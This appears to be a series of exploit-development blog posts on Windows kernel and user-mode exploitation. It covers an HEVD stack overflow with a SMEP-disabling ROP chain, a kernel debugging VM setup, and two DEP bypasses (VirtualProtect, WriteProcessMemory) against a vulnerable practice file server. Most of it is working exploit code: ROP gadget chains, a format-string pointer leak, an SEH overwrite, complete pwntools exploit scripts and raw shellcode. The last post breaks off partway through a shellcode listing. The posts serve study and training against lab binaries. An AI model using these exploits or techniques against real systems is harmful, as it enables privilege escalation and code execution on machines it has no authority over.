	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x350ef8 ^ 1UL << 20;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, bufSize, NULL, 0, NULL, NULL);
	
	printf("[>] Enjoy your shell!\n");
	system("cmd");
    return 0;
}
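
The buffer the exploit sends is easy to get wrong, so here is a rough Python sketch of the same layout. It assumes the padding length and gadget offsets from the exploit above (which are specific to this kernel build); nt_base and shellcode_addr are placeholder values, not something read from a real system. SMEP is bit 20 of CR4, so clearing that bit gives the same value as the XOR in the C code.

```python
import struct

SMEP_BIT = 1 << 20                       # CR4.SMEP
cr4_observed = 0x350ef8                  # CR4 value used in the exploit above
cr4_no_smep = cr4_observed & ~SMEP_BIT   # same result as 0x350ef8 ^ (1 << 20)

def build_buffer(nt_base, shellcode_addr, pad_len=2072):
    """Padding up to the return address, followed by four 64-bit ROP entries."""
    chain = [
        nt_base + 0x20a386,   # POP_RCX gadget (offset from the exploit above)
        cr4_no_smep,          # value that ends up in rcx
        nt_base + 0x3acd47,   # MOV_CR4_RCX gadget
        shellcode_addr,       # user-mode shellcode, reachable once SMEP is off
    ]
    return b"A" * pad_len + struct.pack("<4Q", *chain)

# Placeholder addresses, for illustration only
buf = build_buffer(0xfffff80427000000, 0x0000026a93680000)
```

The resulting length is 2072 + 4 * 8 bytes, which matches bufSize in the C code.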

Running the exploit results in a SYSTEM shell on the target:

The post Windows Kernel Exploitation – HEVD x64 Stack Overflow appeared first on Vulndev.

Windows Kernel Exploitation – VM Setup

By: xct
1 July 2022 at 09:43

In this series about Windows kernel exploitation, we will explore various kernel exploit techniques & targets. This topic is mainly something I studied to prepare for AWE. This short first part will deal with the VM setup for the rest of the series. I can not offer downloadable VMs so you will have to follow the steps outlined here to get a comparable environment.

OS Setup

We will use Windows 11 for both the debugger and the debuggee and everything will be running on VMware Workstation 16. To allow the installation of Windows 11 on VMware, we will have to encrypt the VM:

Then we add a TPM:

If you don’t have a Windows 11 ISO you can get a version here. Note that using Insider Preview is not a good idea since the symbols are not always fully available. After the installation is completed & all updates are installed, create a low-privileged user called user:

net user user user /add

We also want to disable the Windows Update Service (we don’t want gadgets to change because of Windows updates). Now we continue to install tools we will need later on.

WinDbgX

WinDbgX (or WinDbg Preview) can be installed for free from the Microsoft Store. We are not using python/mona so we won’t install it. After installing, start it once and set the symbol path in File->Settings->Debugging Settings to srv*c:\symbols*http://msdl.microsoft.com/download/symbols.

Other Tools

Other tools we install/download on this VM are Visual Studio, Visual Studio Code, rp++ and IDA Free.

Duplicating the VM

After preparing our VM, we need to clone it (Right-Click on VM->Manage->Clone) in order to get a Debugger & Debuggee VM.

At this point, you should have 2 identical VMs. On older versions of Windows, we would have to modify the .vmx files in order to allow debugging via serial port. Since this is all Windows 10+, we can debug everything nicely via TCP/IP instead.

Setting up Kernel Debugging

First, we set up proper networking. In my case both VMs have a NAT adapter for internet access & an additional adapter to communicate (VMNET-X):

  • Debugger VM: 172.16.0.100
  • Debuggee VM: 172.16.0.101

On the debuggee VM:

bcdedit /debug on
bcdedit /dbgsettings net hostip:172.16.0.100 port:50000 key:1.2.3.4

On the debugger VM we just have to start WinDbgX and attach it to the kernel:

After a restart of the debuggee WinDbgX automatically attaches and breaks for us:

Connected to Windows 10 22000 x64 target at (Fri Jul  1 02:29:02.526 2022 (UTC - 7:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*
Executable search path is: 
Windows 10 Kernel Version 22000 MP (1 procs) Free x64
Edition build lab: 22000.1.amd64fre.co_release.210604-1628
Machine Name:
Kernel base = 0xfffff804`27000000 PsLoadedModuleList = 0xfffff804`27c29650
System Uptime: 0 days 0:00:02.213
KDTARGET: Refreshing KD connection


We enter g to let the startup continue. At this point our setup is complete and we create a snapshot on both VMs (with the debugger running). Finally, to make sure everything is working, we start notepad.exe on the debuggee VM & then see if we can debug it:

!dml_proc
...
ffff9485`c0f26080 23c8 Notepad.exe  
...
.process /i ffff9485c0f26080 Notepad.exe
g
!process
PROCESS ffff9485c0f26080
    SessionId: 1  Cid: 23c8    Peb: 5fab251000  ParentCid: 10ec
    DirBase: 1aec4a000  ObjectTable: ffffa80fb00d0800  HandleCount: 257.
    Image: Notepad.exe

At this point, everything is working as expected and we can start looking at exploitation in the next post.

Note that under normal circumstances you can not load any unsigned drivers like HEVD on Windows 11. However, when a kernel debugger is attached, this restriction no longer applies.

The post Windows Kernel Exploitation – VM Setup appeared first on Vulndev.

Bypassing DEP with VirtualProtect (x86)

By: xct
14 June 2022 at 18:46

In the last post we explored how to exploit the rainbow2.exe binary from the vulnbins repository using WriteProcessMemory & the “skeleton” method. Now we are going to explore how to use VirtualProtect. Instead of setting up the arguments on the stack with dummy values and then replacing them, we are going to use the pushad instruction to push all registers onto the stack & then execute our function.

We start from the following exploit template:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      0xdeadc0de,
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += b"A" * (offset-len(rop))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close()

0:003> p
deadc0de ??              ???

As before, we are going to use a stack pivot to land in our input buffer and execute a rop chain which just consists of a dummy instruction at this point. Let’s explore how pushad works: Pushes the following registers in the following order onto the stack: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI (https://c9x.me/x86/html/file_module_x86_id_270.html) .
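
To get a feeling for the resulting stack layout, the push order can be modelled in a few lines of Python. This is just a sketch of the documented pushad behaviour; the register values are the ones from the debugger output further down in this post and only serve as an example.

```python
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

def pushad_layout(regs):
    """Return [(address, register, value)] sorted from lowest address upwards."""
    esp = regs["ESP"]
    slots = []
    for name in PUSHAD_ORDER:
        esp -= 4
        # The ESP slot receives the value ESP had before pushad started
        slots.append((esp, name, regs[name]))
    return sorted(slots)

# Example values, ESP is the stack pointer right before pushad executes
regs = {
    "EAX": 0x76c304c0, "ECX": 0x3fb5635a, "EDX": 0x00000040, "EBX": 0x00000501,
    "ESP": 0x0151f7b0, "EBP": 0x3fb2d695, "ESI": 0x3fac4af9, "EDI": 0x3fb274c7,
}
layout = pushad_layout(regs)
for addr, name, value in layout:
    print(f"{addr:08x}  {value:08x}  {name}")
```

EDI ends up at the lowest address, so whatever it holds is the first thing a following ret will jump to, and EAX ends up at the highest address.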

We also need to know what arguments VirtualProtect expects:

BOOL VirtualProtect(
  [in]  LPVOID lpAddress,
  [in]  SIZE_T dwSize,
  [in]  DWORD  flNewProtect,
  [out] PDWORD lpflOldProtect
);

The first argument lpAddress is the address at which we want to change memory protections, dwSize gives the size, flNewProtect is a mask for the new protections we want (0x40 = PAGE_EXECUTE_READWRITE) and lpflOldProtect must be a writeable address so the old protections can be stored. If we look at the order in which pushad places the values on the stack, we should set up the registers as follows (they will end up on the stack exactly in the order below but in reverse, e.g. ropnop being the first gadget):

# Registers
EAX 90909090  => Shellcode                                               
ECX &writable => lpflOldProtect                                
EDX 00000040  => flNewProtect                                   
EBX 00000501  => dwSize                                           
ESP ????????  => lpAddress (ESP)                         
EBP ????????  => Redirect control flow to ESP              
ESI ????????  => &VirtualProtect
EDI ????????  => RopNop

Setting those registers up correctly requires some planning: as soon as you are done setting up one of them, you can not use it anymore to set up the other registers. That’s why we have to set up the more commonly used registers at the end.

We start by setting up ebx. Note that in order to get 0x501 into the register without having null bytes we can use an add eax, <DWORD> instruction and calculate the difference. In this case there is add eax,5D40C033;. If we calculate ? 0x501 - 0x5d40c033 = a2bf44ce we get the value we have to put into eax to end up with the value we want, which we then move into ebx via xchg.

# EBX
# Blocked: None
0x4CBFB + binary_base,  # pop eax; ret;
0xa2bf44ce,             # put delta into eax (goal: 0x00000501 into ebx)
0x7720E + binary_base,  # add eax,5D40C033; ret;
0x3AE24 + binary_base,  # xchg eax, ebx; ret;
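
The delta calculation is plain 32-bit wrap-around arithmetic, so it can be double-checked in Python. The sketch below assumes the bad characters used for the msfvenom payload later in this post; the second call anticipates the add eax, 0x5D58026A gadget that is used for edx.

```python
# Bad characters for this target (taken from the msfvenom command in this post)
BAD = bytes.fromhex("000102030405060708090a0b0c0d202f5c")

def delta_for(target, addend):
    """Value to pop into eax so that (value + addend) mod 2**32 == target."""
    return (target - addend) & 0xFFFFFFFF

def is_clean(dword):
    """True if none of the 4 bytes of the dword is a bad character."""
    return not any(b in BAD for b in dword.to_bytes(4, "little"))

ebx_delta = delta_for(0x501, 0x5D40C033)   # dwSize
edx_delta = delta_for(0x40, 0x5D58026A)    # flNewProtect
print(hex(ebx_delta), is_clean(ebx_delta))
print(hex(edx_delta), is_clean(edx_delta))
```

Checking the delta with is_clean before putting it into the chain saves a debugging round trip when a different gadget constant has to be used.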

Now we set up edx. We use the same trick again to get the null byte free value of 0x40 into the register.

# EDX
# Blocked: EBX
0x4CBD7 + binary_base,  # pop eax; ret;
0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
0x76EFF + binary_base,  # add eax, 0x5D58026A       
0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
0x41414141,             # dummy

We continue by setting ecx. Since this needs a writable address we get one via WinDBG as described in the other post and just pop the value into the register.

# ECX
# Blocked: EBX, EDX
0x72D31 + binary_base,  # pop ecx; ret;
0xA635A + binary_base,  # &writable location

For edi, we set the address of a ropnop gadget directly via pop:

# EDI
# Blocked: EBX, EDX, ECX
0x32301 + binary_base,  # pop edi; ret;
0x774C7 + binary_base,  # ropnop

We set esi by popping the address of a jmp eax gadget. Normally this would hold the address of VirtualProtect but we will store VirtualProtect at the very end in eax – so placing jmp eax here will achieve the same.

# ESI
# Blocked EBX, EDX, ECX, EDI
0x24261 + binary_base,  # pop esi; ret;      
0x14AF9 + binary_base,  # jmp eax (just stored, not executed right away)

Finally we set up eax with the address of VirtualProtect. This is a bit tricky because we do not have a leak in kernel32 and the binary does not use VirtualProtect itself. We can, however, get the address of another kernel32 function from the IAT (just as in the other post) and then subtract the offset between the two functions.

0:001> ?kernel32!WriteFile - kernel32!VirtualProtectStub
Evaluate expression: 12528 = 000030f0

# EAX
# Blocked EBX, EDX, ECX, EDI, ESI
0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x7D695 + binary_base,  # pop ebp dummy 

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp
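
The number of sub gadgets in the EAX part is not arbitrary: the distance 0x30f0 has to be split into the two step sizes we have gadgets for. A small sketch of that bookkeeping, assuming the "sub eax,1000" gadget subtracts 0x1000 (which is what makes the sum work out) and using a WriteFile address that is simply derived from the register dump in this post:

```python
def sub_plan(distance, big=0x1000, small=0x30):
    """Split `distance` into a count of big and small subtraction gadgets."""
    n_big, rest = divmod(distance, big)
    n_small, leftover = divmod(rest, small)
    if leftover:
        raise ValueError(f"0x{leftover:x} bytes can not be covered by these gadgets")
    return n_big, n_small

n_big, n_small = sub_plan(0x30f0)

# Example: WriteFile pointer as it would be read from the IAT (derived value)
write_file = 0x76c335b0
virtual_protect = write_file - n_big * 0x1000 - n_small * 0x30
print(n_big, n_small, hex(virtual_protect))
```

If the offset between the two functions differs on another kernel32 version, the plan has to be recalculated and may need a gadget with a different step size.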

At this point we can call the pushad instruction to put everything on the stack which then looks as follows:

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp
eax=76c304c0 ebx=00000501 ecx=3fb5635a edx=00000040 esi=3fac4af9 edi=3fb274c7
eip=3fb252ec esp=0151f790 ebp=3fb2d695

0:003> dd /c1 esp
0151f790  3fb274c7 # ropnop
0151f794  3fac4af9 # jmp eax (eax=&VirtualProtect)
0151f798  3fb2d695 # pop ebp (pops 76c304c0)
0151f79c  0151f7b0 # ptr sc  ----
0151f7a0  00000501               |
0151f7a4  00000040               |
0151f7a8  3fb5635a               |
0151f7ac  76c304c0               |
0151f7b0  3fac1394 # jmp esp     |
0151f7b4  90909090  <------------
...

At this point we can execute our shellcode and get our calc. The full exploit can be found below:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x10
# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -b '\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2f\x5C'
sc += b"\x29\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
sc += b"\x76\x0e\xad\x9c\x2a\x96\x83\xee\xfc\xe2\xf4\x51\x74"
sc += b"\xa8\x96\xad\x9c\x4a\x1f\x48\xad\xea\xf2\x26\xcc\x1a"
sc += b"\x1d\xff\x90\xa1\xc4\xb9\x17\x58\xbe\xa2\x2b\x60\xb0"
sc += b"\x9c\x63\x86\xaa\xcc\xe0\x28\xba\x8d\x5d\xe5\x9b\xac"
sc += b"\x5b\xc8\x64\xff\xcb\xa1\xc4\xbd\x17\x60\xaa\x26\xd0"
sc += b"\x3b\xee\x4e\xd4\x2b\x47\xfc\x17\x73\xb6\xac\x4f\xa1"
sc += b"\xdf\xb5\x7f\x10\xdf\x26\xa8\xa1\x97\x7b\xad\xd5\x3a"
sc += b"\x6c\x53\x27\x97\x6a\xa4\xca\xe3\x5b\x9f\x57\x6e\x96"
sc += b"\xe1\x0e\xe3\x49\xc4\xa1\xce\x89\x9d\xf9\xf0\x26\x90"
sc += b"\x61\x1d\xf5\x80\x2b\x45\x26\x98\xa1\x97\x7d\x15\x6e"
sc += b"\xb2\x89\xc7\x71\xf7\xf4\xc6\x7b\x69\x4d\xc3\x75\xcc"
sc += b"\x26\x8e\xc1\x1b\xf0\xf6\x2b\x1b\x28\x2e\x2a\x96\xad"
sc += b"\xcc\x42\xa7\x26\xf3\xad\x69\x78\x27\xda\x23\x0f\xca"
sc += b"\x42\x30\x38\x21\xb7\x69\x78\xa0\x2c\xea\xa7\x1c\xd1"
sc += b"\x76\xd8\x99\x91\xd1\xbe\xee\x45\xfc\xad\xcf\xd5\x43"
sc += b"\xce\xfd\x46\xf5\x83\xf9\x52\xf3\xad\x9c\x2a\x96"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      # EBX
      # Blocked: None
      0x4CBFB + binary_base,  # pop eax; ret;
      0xa2bf44ce,             # put delta into eax (goal: 0x00000501 into ebx)
      0x7720E + binary_base,  # add eax,5D40C033; ret;
      0x3AE24 + binary_base,  # xchg eax, ebx; ret;

      # EDX
      # Blocked: EBX
      0x4CBD7 + binary_base,  # pop eax; ret;
      0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
      0x76EFF + binary_base,  # add eax, 0x5D58026A       
      0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
      0x41414141,             # dummy

      # ECX
      # Blocked: EBX, EDX
      0x72D31 + binary_base,  # pop ecx; ret;
      0xA635A + binary_base,  # &writable location

      # EDI
      # Blocked: EBX, EDX, ECX
      0x32301 + binary_base,  # pop edi; ret;
      0x774C7 + binary_base,  # ropnop

      # ESI
      # Blocked EBX, EDX, ECX, EDI
      0x24261 + binary_base,  # pop esi; ret;      
      0x14AF9 + binary_base,  # jmp eax (just stored, not executed)

      # EAX
      # Blocked EBX, EDX, ECX, EDI, ESI
      0x704F4 + binary_base,  # pop eax; ret;
      0x9015C + binary_base,  # IAT WriteFile
      0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x7D695 + binary_base,  # pop ebp dummy 

      0x752EC + binary_base,  # pushad
      0x11394 + binary_base,  # jmp esp
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += sc
buf += b"A" * (offset-len(rop)-len(sc))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close() 

The post Bypassing DEP with VirtualProtect (x86) appeared first on Vulndev.

Bypassing DEP with WriteProcessMemory (x86)

By: xct
12 June 2022 at 12:31

Intro

In this post I will show an example on how to bypass DEP with WriteProcessMemory. This is a bit more complicated than doing it with VirtualProtect but nonetheless an interesting technical challenge. For the target binary I will use rainbow2.exe from my vulnbins repository.

I will skip the reversing/vulnerability discovery part for this post (feel free to explore it by yourself) – essentially we have a file server that has 2 commands:

LST <PATH>
GET <PATH>

Enabled protections are GS, ASLR & DEP. The binary has (at least) 2 vulnerabilities, a format-string vulnerability in path & a stack overflow that is also in path. Note that if you want to play with the binary you have to put it in C:\shared\ as it expects this as the file root.

Format String Vulnerability

By supplying a path containing format string specifiers like %p, we can leak the contents of the stack. This will allow us to leak a pointer from the binary, calculate the binary’s base address & thereby defeat ASLR.

Stack Overflow

By supplying a path longer than 1024 bytes we overflow a stack buffer. Since GS is enabled we can not just write through the stack cookie and over the return address in order to exploit it. We can however provide a sufficiently large buffer so that the SEH handler gets overwritten, which defeats GS as we can continue execution from there without returning from the function.

Getting Started

Knowing the vulnerabilities we start by writing an exploit poc that leaks the base address:

#!/usr/bin/env python3
from pwn import *

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

We connect to the server and send LST |%p|%p|%p|%p|, which leaks 4 pointers from the stack:

[DEBUG] Sent 0x12 bytes:
    b'LST |%p|%p|%p|%p|\n'
[DEBUG] Received 0x41 bytes:
    b'ERROR: Can not open Path: |8ACA5DF4|3FAC4120|3FAC4120|0133E550|\n'

In WinDBG we can see that 0x3fac4120 is an address of the binary itself. We calculate the difference of this pointer to the load address of the binary:

0:001> ? 3fac4120-3fab0000 
Evaluate expression: 82208 = 00014120
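
The parsing step of the poc can be tried offline against the captured response. The following sketch uses only the standard library; the function name and its defaults are our own choice, while the sample line and the 0x14120 offset are the ones shown above.

```python
def base_from_leak(line, index=1, offset=0x14120):
    """Extract the index-th %p value from the server reply and subtract the offset."""
    fields = line.strip().split(b"|")[1:-1]   # drop the text before the first '|' and the empty tail
    return int(fields[index], 16) - offset

sample = b"ERROR: Can not open Path: |8ACA5DF4|3FAC4120|3FAC4120|0133E550|\n"
base = base_from_leak(sample)
print(hex(base))
```

A quick sanity check for the result is that the low 16 bits are zero, since image bases on Windows are aligned to 64 KB.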

Since this offset does not change between restarts and the leaked pointer is always the 2nd value on the stack, we can reliably subtract it to get the base address of the binary. If you are used to binary exploitation on Linux you might wonder if we can use %n here to get a write primitive. This is not possible because the Microsoft C runtime disables %n by default.

The next task is to find the offset at which we overwrite SEH. To do so we generate a pattern (msf-pattern_create -l 4000), send it and use it to get the offset (msf-pattern_offset -q ... -l 4000) at which we have to put the value that overwrites our SEH entry. We don’t know much about the required length yet but trying a few values and observing if any of them crashes the application and if a pattern value appears on !exchain is a viable approach. Eventually this will lead to the offset 1032.
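
If the Metasploit tools are not at hand, the same idea can be reproduced in a few lines. The sketch below is our own re-implementation of the well-known Aa0Aa1Aa2... pattern, not the Metasploit code itself, and it is limited to 20280 bytes.

```python
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def pattern_create(length):
    """Build the Aa0Aa1Aa2... pattern, truncated to `length` bytes."""
    out = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        out.append(upper + lower + digit)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length].encode()

def pattern_offset(value, length):
    """Offset of a 32-bit value (as shown by the debugger) inside the pattern, or -1."""
    needle = value.to_bytes(4, "little")
    return pattern_create(length).find(needle)

pattern = pattern_create(4000)
# Pretend the debugger showed the dword located at offset 1032
seen = int.from_bytes(pattern[1032:1036], "little")
print(pattern_offset(seen, 4000))
```

The value has to be converted to little-endian bytes before searching, because the debugger prints the dword with its bytes in reverse order.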

With these new insights we can update the poc to crash the target and place Bs inside NSEH & Cs inside SEH.

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += b"A" * (offset)
buf += b"B" * 4 # nseh
buf += b"C" * 4 # seh
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close()

0:001> !exchain
0170f6a0: 43434343 (SEH)
Invalid exception stack at 42424242 (NSEH)

Warming Up

Now we have to find a single gadget that somehow gets us back to our input buffer.

0:001> r esp
esp=0170eab0
0:001> s -a 0 L?80000000 "AAAAAAAAAAAAAAA"
0133e66c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
015205c0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
0170f298  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

The start of our As appears 3 times in memory. The last one looks like the most promising one because it’s somewhat close to our stack pointer:

0:001> ? 0170f298 - 0170eab0
Evaluate expression: 2024 = 000007e8

To find a gadget that can jump that far (or a bit further, it does not have to be exact) we can use ropper:

ropper --file rainbow2.exe --console
search add esp, %
...
0x4011139d: add esp, 0xd60; ret;
0x40111396: add esp, 0xe10; ret;
...

These look promising. We replace the Cs (the SEH entry) with the gadget that adds 0xe10 to esp, taking the leaked binary base into account, and then run the exploit again.

...
buf += b"B" * 4 # nseh
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
...

We set a breakpoint on the gadget and see if we can hit our buffer:

0:003> !exchain
0164fbd4: filesrv+11396 (3fac1396)
Invalid exception stack at 42424242
0:003> ba e1 3fac1396
0:003> g
Breakpoint 0 hit
filesrv+0x11396:
3fac1396 81c4100e0000    add     esp,0E10h
0:003> p
3fac139c c3              ret
0:003> dd esp
0164f844  41414141 41414141 41414141 41414141

We indeed managed to land inside our buffer, more precisely at the part before our SEH gadget. By going back a bit we can see that we are about 0x78 bytes into our buffer.

0:003> dd esp-80 L40
0164f7c4  00000000 0000000f 41414141 41414141
0164f7d4  41414141 41414141 41414141 41414141
...

This is pretty good since we placed 1036 As and most of them are still ahead of us, leaving us with some room to work with. Since DEP is enabled, we can not simply execute shellcode here and have to think about how we can utilize ROP to make progress.

Playing with ROP

Ultimately we want to call a function that allows us to get around DEP and execute shellcode. Good candidates are VirtualProtect, VirtualAlloc or WriteProcessMemory. Since we are on x86, the arguments for function calls will be placed on the stack. I’m aware of 2 different approaches to set up function arguments in this situation. We could carefully prepare the registers and then execute pushad so the values are put onto the stack. This all has to be done in ROP though, and every time you set up a register you can not use it anymore later on, which makes this a bit tricky.

Another approach is to prepare a call “skeleton”, an area that has dummy values for the function arguments on the stack. We then get a reference to the skeleton and replace the dummy values with the ones we need. In the end we pivot the stack to the skeleton and therefore execute the function we want.

As mentioned in the beginning, for this post we want to call WriteProcessMemory. This will allow us to write our shellcode to a codecave that is already executable but not writeable. WriteProcessMemory internally calls VirtualProtect to temporarily make the area writeable, writes the data & then restores memory permissions. WriteProcessMemory has the following Signature:

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

Which in our skeleton looks like this:

0xffffffff, # hProcess (-1 == current process)
codecave,   # lpBaseAddress (dst)
0x42424242, # lpBuffer (src) 
0x43434343, # nSize
writeable,  # lpNumberOfBytesWritten
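
Since the skeleton is sent as part of the payload, it has to survive the bad characters as well. Here is a small sketch that packs the five arguments and reports offending bytes; the codecave address is a made-up example and the writeable address is binary_base + 0xA635A for the base seen in this post.

```python
import struct

BAD = bytes.fromhex("000102030405060708090a0b0c0d202f5c")

def build_skeleton(codecave, writeable):
    """Pack the WriteProcessMemory arguments as five little-endian dwords."""
    args = [
        0xFFFFFFFF,   # hProcess (-1 == current process)
        codecave,     # lpBaseAddress (dst)
        0x42424242,   # lpBuffer (src), patched via ROP later
        0x43434343,   # nSize, patched via ROP later
        writeable,    # lpNumberOfBytesWritten
    ]
    return struct.pack("<5I", *args)

def bad_offsets(blob):
    """Offsets inside `blob` that contain a bad character."""
    return [i for i, b in enumerate(blob) if b in BAD]

skeleton = build_skeleton(codecave=0x3fb42c10, writeable=0x3fb5635a)
print(skeleton.hex(), bad_offsets(skeleton))
```

An address like 0x3fb42c00 would be reported at offset 4, so the codecave has to be chosen (or shifted by a few bytes) until the list is empty.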

This approach has one caveat – if we have to avoid bad bytes in our shellcode and we copy it to a non writable area, we can not use any shellcode that needs to modify itself (e.g. all msfencoders). In order to get around that we will have to do the shellcode encoding before we send it and then use ROP to decode it, while it is still on the stack (before we copy it & jump to the codecave copy).

To discover bad bytes we send all bytes from 0x00 – 0xFF and remove all the ones where the binary does not crash anymore or those that get mangled. This results in the following bad chars:

\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C

Since it will be pretty difficult to craft shellcode that does not contain any of these we will go with the ROP shellcode decoder as just mentioned. Before we dive into that, let’s look at the structure the exploit is going to have. Since we are dealing with some space restrictions we have to be careful about the layout.

LST | Skeleton + RopNops + Decoder + RopNops | NSEH (dummy) + SEH (stack pivot) | RopNops + RopWriteProcessMemorySetup + Shellcode + Padding |
    | ----------------1036-------------------|----------------8-----------------|------------------------ ~2200 -----------------------------|

Note that even though we send 4000 Bytes, not all of them will end up on the stack. We are running into a page boundary which will cut it closer to 3200-3300 Bytes.

Shellcode Encoding & Decoding

The first problem we are going to tackle is the Shellcode encoding & decoding. Our shellcode for this post will be the following one:

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -e none
sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
